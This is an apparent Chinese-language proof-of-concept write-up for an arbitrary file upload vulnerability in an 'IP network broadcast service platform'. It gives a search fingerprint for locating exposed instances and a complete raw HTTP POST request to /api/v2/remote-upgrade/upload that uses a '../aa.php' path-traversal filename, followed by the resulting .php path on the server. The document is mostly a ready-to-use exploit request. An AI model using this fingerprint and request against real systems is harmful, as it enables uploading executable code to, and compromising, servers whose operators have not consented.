IP网络广播服务平台任意文件上传漏洞
一、漏洞简介
IP网络广播服务平台存在任意文件上传漏洞
二、影响版本
- IP网络广播服务平台
三、资产测绘
web.icon=="9091011a03bffd9898d79fc589a2c65d"
四、漏洞复现
POST /api/v2/remote-upgrade/upload HTTP/1.1
Host:
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----234561
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Length: 149
------234561
Content-Disposition: form-data; name="file"; filename="../aa.php"
Content-Type: application/octet-stream
234561
------234561--
/uploads/remote_upgrade/13e7dc1e3cace50a7ef377856b95206e.php